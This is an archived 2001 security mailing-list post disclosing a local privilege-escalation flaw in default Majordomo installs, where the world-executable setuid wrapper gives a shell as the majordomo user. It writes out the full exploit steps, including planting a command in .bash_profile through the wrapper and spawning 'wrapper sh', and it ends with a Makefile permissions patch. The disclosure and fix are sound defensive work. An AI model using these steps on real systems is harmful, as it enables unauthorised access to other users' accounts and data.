Majordomo default vulns

From: Marco van Berkum (m.v.berkumat_private)
Date: Fri Sep 14 2001 - 02:24:27 PDT

  • Next message: Mario Schmidt: "Proof-Of-Concept Perl Script for Bugtraq-ID: #3334"

    I found something to discuss, this time involving majordomo. 
    This was  tested on a Slackware linux 8.0 (kernel 2.4.8); 
    majordomo version 1.94.4, I also tested the other versions 
    and all _default_ installs had the same problem, note that 
    the versions 1.94.1 an 1.94.2 should NOT be used anymore, 
    those are way more simple to exploit. 
    We all know that if you install majordomo you should 
    CAREFULLY read the INSTALL file, simply because else 
    you will have a security problem. Only I doubt that everyone 
    actually follows the guidelines. Besides that, I feel that 
    Majordomodevelopers _could_ make a more secure default 
    install without affecting the functionality of the program. 
    A simple patch would _at least_ stop the possiblities which 
    are descibed below. 
    Also I did not find in the documents that majordomo should 
    have a shell (so give it a nologin or whatever, it works fine 
    without shell). 
    An example: 
    Who am i 
    marco@anubis:~$ id -a 
    uid=1001(marco) gid=100(users) groups=100(users) 
    This could happen if you give it a /home/majordomo 
    marco@anubis:~$ ls -al /home/|grep majordomo 
    drwxr-x--x    6 majordom daemon       4096 Sep 13 23:50 majordomo/ 
    Suidbit + executable for everyone (this is where the patch comes in) 
    marco@anubis:~$ ls -al ~majordomo/wrapper 
    -rwsr-xr-x    1 root     daemon      16451 Aug 31 13:51 
    This is the program I'm going to abuse 
    marco@anubis:~$ ls -al ~majordomo/ 
    -rwxr-xr-x    1 majordom daemon       5234 Aug 31 13:51
    Make a template 
    marco@anubis:~$ echo "ln -s /bin/sh ~/majordomo/sh 2>/dev/null">test 
    Append majordomo's .bash_profile (or .profile etc..) with your template 
    using buggy (yes, not wrapper is buggy here, is, 
    that one can use /'s, I need wrapper for becoming user majordomo
    marco@anubis:~$ ~majordomo/wrapper -f .bash_profile -a
    Now hit the .bash_profile (sometimes the majordomo admin might need it 
    and do the same). 
    marco@anubis:~$ su - majordomo 
    majordomo@anubis:~$ id -a 
    uid=666(majordomo) gid=2(daemon) groups=2(daemon) 
    majordomo@anubis:~$ exit 
    See if it worked 
    marco@anubis:~$ ls -al ~majordomo/sh 
    lrwxrwxrwx    1 majordom daemon          7 Sep 13 23:57 
    /home/majordomo/sh -> /bin/sh* 
    Jupz it worked, now someone could abuse it, let's do that. 
    marco@anubis:~$ ~majordomo/wrapper sh 
    sh-2.05$ id -a 
    uid=666(majordomo) gid=2(daemon) groups=100(users) 
    Ok, I'm majordomo. 
    Also, in the README file is described how one could debug majordomo. 
    Finally, if you're up to mucking around in the perl code, symlinking 
    perl into ~majordomo and invoking it via wrapper will give you a debug 
    environment with Majordomo's permissions and view of the world: 
                    ~majordomo% ./wrapper perl -d majordomo 
    Well, same problem :) 
    Dont forget to remove the symlink or else everyone can do this: 
    marco@anubis:~$ /home/majordomo/wrapper perl 
    One could append the perlfiles to make them execute your evil code of 
    course since the archive2 program appends. This could give a majordomo 
    uid/daemon gid shell. 
    The main point here is that we can write to majordomo owned files to 
    simply alter data in the lists or score a shell (and obtaining a daemon
    reading the INSTALL file carefully will help you to prevent this, but I 
    prefer to apply a patch before starting the  installation to make sure
    the wrapper is not executable for everyone (it _should_ have 4750 and
    not 4755). 
    --- simple patch to make default install more secure --- 
    --- Makefile.orig       Fri Sep 14 09:43:45 2001 
    +++ Makefile    Fri Sep 14 09:44:20 2001 
    @@ -42,7 +42,7 @@ 
     # change these values! 
     WRAPPER_OWNER = root 
    -WRAPPER_MODE = 4755 
    +WRAPPER_MODE = 4750 
     # Otherwise, if your system is NOT POSIX (e.g. SunOS 4.x, SGI Irix 4, 
     # HP DomainOS) then comment out the above four lines and uncomment 
    just my 2 cents, 
    Marco van Berkum 
    GCC dpu s:--- a- C+++ US++++ P++ L+++ E---- W N o-- K w---
    O- M-- V-- PS+++ PE-- Y+ PGP--- t--- 5 X R* tv++ b+++ DI-- D----
    G++ e- h+ r y*
    |  Marco van Berkum   |   MB17300-RIPE   | Security Engineer |
    |  | "Chernobyl used  | Network Admin     |
    |  m.v.berkumat_private |     Windows"     |      UNIX         |

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